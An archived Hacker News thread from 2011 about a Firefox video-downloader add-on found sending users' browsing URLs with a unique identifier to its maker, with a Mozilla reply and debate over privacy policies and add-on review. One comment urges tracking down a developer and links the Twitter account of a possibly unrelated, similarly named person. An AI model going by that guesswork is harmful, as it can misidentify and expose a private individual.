Hacker News new | comments | ask | show | jobs | submit login
Firefox add-on with 7m downloads secretly tracks your browsing history (iwtf.net)
170 points by toni on May 20, 2011 | hide | past | web | favorite | 56 comments



I'm from the add-ons team at Mozilla.

We've looked into the Ant Video Player and found that it does send information about websites users visit in order to power its ranking feature displayed for each website, and also includes a unique identifier in this communication. While this does not violate our policies, we do require it to be disclosed in the privacy policy and the add-on's description. We have contacted the developer and asked them to correct this.

The developer has been in communication with us and says that they destroy all user-identifiable information from their logs, and that their privacy policy and add-on description will be updated to reflect that. They'll also show a notice about this on their first-run website.

Additionally, the AntRank feature that uses this tracking can be disabled.

Add-ons publicly available in our gallery have been reviewed for security problems, and add-ons that aren't marked as experimental have been fully reviewed for a range of other issues as described in our hosting policies. Because developers set their own privacy policies and can update them any time, it is more difficult for us to review them for compliance with their own rules. We encourage users to always read an add-on's privacy policy if one is provided and to use the Report Abuse link if anything suspicious is noticed.


You should also require that AntRank be disabled while in private browsing mode.


Private Browsing Mode is for browsing without storing information on your computer. It has nothing to do with websites tracking you; that's what the Do Not Track feature is. We do require that add-ons respect Private Browsing Mode, and our privacy team is working on a recommendation (not a requirement) that add-ons also honor the user's Do Not Track preferences.

As the person who implemented Private Browsing describes: Private Browsing aims to help you make sure that your web browsing activities don't leave any trace on your own computer. It is very important to note that Private Browsing is not a tool to keep you anonymous from websites or your ISP, or for example protect you from all kinds of spyware applications which use sophisticated techniques to intercept your online traffic. Private Browsing is only about making sure that Firefox doesn't store any data which can be used to trace your online activities, no more, no less.

http://ehsanakhgari.org/blog/2008-11-04/dont-leave-trace-pri...


You should create a policy that completely prohibits this behavior.


Not everyone has the same values as you. There's nothing inherently wrong with not caring if somebody knows where you surf, and being interested in the recommendations that their tool can provide.

Disclosure is good. Homogeneity and coercion are bad.


Exactly. From what I can tell, there's not much difference between the information ant is collecting and that that's regularly sent back to Google from Chrome, except that the latter is likely even more invasive.


And why does Google's invasion of privacy make this okay?

This is why the governments of the world need to implement do not track laws.


The very last thing we need is for the government to put more regulation on the Internet. The only thing that's kept their heavy hands from destroying things so far, is that they're also incompetent with technical issues.


I'm fine with reasonable regulation. When you have an oligopoly controlling the infrastructure, having regulations that say they can't sell preferential access to that infrastructure to other oligopolies is a good thing. The key metric of what's good for the consumer is competition, not regulation. Regulation that stifles competition is bad. Regulation that protects it is good. Regulation itself is simply a tool, and it's moral worth lies in how it's used.


Regulation that protects [competition] is good.

Not necessarily. There's no point in using regulation to preserve competition between buggy whip manufacturers. Creative destruction puts an end to many industries. And in some cases, its death throes can easily look like a market failure rather than market success.

In the end, who decides if it's a buggy whip industry? And who decides if a corporation is an oligopoly? Remember, it's likely that in any mature, regulated industry, the regulators are probably industry insiders themselves (see "Regulatory Capture", https://secure.wikimedia.org/wikipedia/en/wiki/Regulatory_ca... ).


Your original post struck a very anti-net neutrality tone. My point was that government regulation in that area, as well as others, can protect both consumers and innovation. If we let any company merge with any other, we would soon have monopolies that stifle competition and gouge consumers.

Not all regulation is bad, just like not all effects of slavish adherence to free market ideals are good. The free market is good in aggregate, but there are many cases where government intervention is beneficial.


Very well, I suppose some people might want to be tracked like a bunch of cattle. In the event that someone does want to do this, then they should have to opt-in. The default should not be opt-out for something as invasive as this.

If Apple were caught doing this, there would be a hearing in front of congress.


"This add-on has been preliminarily reviewed by Mozilla."

What that entails:

"When performing a preliminary review, editors will review the source code for security issues and major policy violations, but will not install the add-on to test functionality in most cases. Preliminary review will be granted unless a security vulnerability or major policy violation is discovered."

From: https://addons.mozilla.org/en-US/developers/docs/policies/re...

Extensions marked 'experimental' are not fully reviewed. Which is why they probably left this plugin marked as 'experimental'.

You can't blame the users since they are installing from a Mozilla page and trusting the brand. I hope this triggers a review of those procedures at Mozilla, since I would consider sending back every site you visit a 'major policy violation'. Very scary.

Edit: they may also want to change the 'experimental' policy and set a time limit to how long an extension can remain experimental, and not list them in the default directory unless users (more advanced users) specifically seek out experimental extensions


I'm not sure if this is still the case, but you used to have to make an account and log in to actually install an experimental add on. There was also a clear warning as well.

I definitely agree with setting a time limit, if feasible.


It also makes you wonder what "Verified Safe by Norton" means on the page for their video downloader.

http://www.ant.com/video-downloader

http://safeweb.norton.com/report/show?url=www.ant.com

The community rating contradicts norton's rating.... sigh.


A quick fgrep found the code making the requests to their servers: http://pastie.org/1932287

Edit: Further code browsing points to the "rank" feature. They rank all URLs that are http/https and the host isn't "localhost". I'm guessing, but if you turn of ranking in the preferences, it will stop logging your page views.


Why not try and track down Dima Sidorchenko (the guy in the header of the source)?

Google thinks the name is Dima Sidorenko and offers up this guy who is a programmer: http://twitter.com/#!/shadow1278

Unless it is Sidorchenko and Dima is a nickname in which case "Dmitriy Sidorchenko" might get better results.


Dima is a standard Russian-language short form for Dmitriy. Like Pete for Peter in English.

The name Sidorchenko sounds Ukrainian.


The files I've looked at have been authored by many different people. (Seed, Zak, RigoNet, Camille, Dmitriy, Dima Sidorchenko, etc.) I don't think Dima is solely responsible for this. The company that had this written should be responsible.


I don't really see the issue here, isn't all of that stated in the privacy policy of the extension ?

https://addons.mozilla.org/en-US/firefox/addon/video-downloa...

Ant.com collects non-personally-identifying information when you are visiting our site or using our software applications, this infomation made available typically from web browsers and servers. Some of the infomation type is: the Uniform Resource Locator (URL) of the web page from wich you came, the date and the time for each page you view, settings such as browser languages, etc.

Ant.com also collects infomation made public to us that can be considered personally identifyable, such as your internet protocol (IP) address. Ant.com does not use such information to identify its visitors and does not disclose such information.


"The web page from wich you came" is just the HTTP "Referer" field; almost every web site in existence collects that as a matter of course. To claim that it covers universal monitoring of all users' web traffic is obscene.

I'm also fairly sure that one can find personally "identifyable" information from URLs that go far beyond mere IP addresses.

Why is ant.com domain info privacy protected anyhow? Seems pretty fishy to me.


The lesson here: don't install shady addons, just as you aren't installing every damn toolbar out there.

Also, this is enough to sue, isn't it?


Rather depressingly, this wasn't so much a shady add-on, as one that was meant to have been vetted by Mozilla.

From the Mozilla Add-Ons FAQ @ https://addons.mozilla.org/en-US/firefox/faq

Are add-ons safe to install? Unless clearly marked otherwise, add-ons available from this gallery have been checked and approved by Mozilla's team of editors and are safe to install. We recommend that you only install approved add-ons. If you wish to install unapproved add-ons or add-ons from third-party websites, use caution as these add-ons may harm your computer or violate your privacy. Learn more about our approval process


"Unless clearly marked otherwise"

This add-on was marked otherwise. (Well, according to the claims above.)

You can definitely argue that having unvetted add-ons on the site at all is bad, but your particular point isn't relevant.


about 150,000 people have downloaded the bit.ly preview add-on, which tells bit.ly everything you visit: http://go-to-hellman.blogspot.com/2010/05/bitly-preview-add-...


Bigend at work? Blue-Ant? Thanks, Mr. Gibson...

And thanks to Simon, I am having a hard enough time with my work and personal to do lists, testing all of my tools for their extranet behaviors is not something I look forward to adding to them...


Privacy policy or not - if it's purpose is to be a video downloader, but it tracks stuff when you are doing something other than video downloading - it's sneaky at best, however it's presented.


And that's why I have Little Snitch on my machine.


I have Little Snitch on my machine too, but I've set up a rule that allows my browser to make calls to port 80.

Are you saying you don't have a generic rule in place, and are instead using Little Snitch to approve calls to port 80 for every new domain you visit? If so, that'd certainly work, but it seems more than a little impractical.


> Are you saying you don't have a generic rule in place, and are instead using Little Snitch to approve calls to port 80 for every new domain you visit?

Yes. And I do the same with cookies.

I do allow connections (and cookies) permanently to "trusted sites", but that's the exception rather than the rule.


Wow, and here I thought I was the only one that did that! I do the same, though with Opera's built-in cookie control features.


I've seen this before in an other smaller extension (I can't remember which) while I was studying how it worked, but fortunatly the code was commented.

Firefox extensions are just plain zip files, I wonder why he hasn't checked the code.


I'm not familiar with Mozilla's add-on policies. Is this an issue due to the user tracking? Or is it because the privacy policy didn't make it clear this was happening?


do a 'whois' on ant.com. I thought it interesting.


Why, because they have whois privacy? That's not so unusual.


For individuals, e.g. blogs and the like; sure. Something which seems awfully like a company (it looks like they're trying to build a search engine); that's much dodgier to my mind.


Yet another reason to browse through an interception proxy. Know what you are sending -- it can be enlightening.


The Ant Video Downloader has been reported as spyware.


Spoiler: Submission title is bait. He calls out "ant video downloader".


You should talk to a good attorney and file a Lawsuit against Mozilla and Ant.com, this could be big!


Seems like an overreaction, imho. This is likely a case of poor Privacy Policy writing and general ineptitude, rather than deliberate evil.

From their feature list: "Easy to use : when a video is detected, the download button becomes clickable." - i.e. our plugin sends all URLs to us for analysis, we respond telling the plugin whether to activate the button

"Integrated Traffic Rank indicator for all the sites you visit." - i.e. we need a way of measuring unique visits to everything

Still, interesting, and good on this guy for bringing it into the public eye.


but absolutely none of that requires a unique identifier, which is where this article focuses most of it's gripe.


It seems like the "Integrated Traffic Rank indicator" could, if they wanted to distinguish uniqueness by users rather than unique IPs.

Not that it's a good idea.


While I usually follow "do not ascribe to malice that which is adequately explained by stupidity", I don't think this case is adequately explained by stupidity.


oh no! say it isn't true!!! it tracks our browsing history!!??!?! that's like as bad as dropping bombs on 8 year olds in iraq isn't it!


Chrome tracks your browsing history... why do people suddenly care when there's an addon for Firefox that does that?


I'd like to see some proof of that. Or in the words of Wikipedia, 'Citation Needed'


Chrome sends every keypress in the URL bar back too Google. http://www.google.com/chrome/intl/en/privacy.html When you type URLs or queries in the address bar, the letters you type are sent to your default search engine so the Suggest feature can automatically recommend terms or URLs you may be looking for.


The autocompletion can easily be turned off.

Anyhow, what is typed on the URL bar is only a small subset of sites visited.


I'd like to see some proof as well. While there is some tracking involved in Chrome, I doubt they track browser history as well.


Perhaps the OP was referring the URL bar sending auto complete requests to google, which some consider tracking...

I don't really know of anything else Chrome does by default that "tracks your history" like this addon does.


Like Apple products, Firefox branded itself as malware proof.

---

http://web.archive.org/web/20041127034451/http://www.mozilla...

"“Beware of spyware. If you can, use the Firefox browser.” - USA Today"

"Privacy and Security

Built with your security in mind, Firefox keeps your computer safe from malicious spyware by not loading harmful ActiveX controls. A comprehensive set of privacy tools keep your online activity your business."

---

While that's technically correct - Firefox couldn't (can't?) load ActiveX controls, therefore it could't load harmful ActiveX controls - the Firefox extensions system has permitted installation of executable code for a long time, if not since its inception. Since that's what ActiveX is, more or less, Firefox has never been any more secure in that respect than e.g. Internet Explorer.

Like Apple products, as Firefox becomes more popular (and therefore a jucier attack target) there will be more malware that targets it.


The difference being that you have to decide to install this harmful extension. ActiveX just gets loaded during regular browsing.


ActiveX hasn't worked that way for a long time. At least since XP SP2, released 2004. Possibly even before then - I'm not sure exactly what XP SP2 changed.

Edit: Fix typo.


Are you blaming Mozilla/Firefox for every possible 3rd party misuse of their software?


No. And rereading my post, I'm just not seeing any blame.

I'm presenting some pertinent history and tying it to the recent Apple malware news, which has been heavily discussed here.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: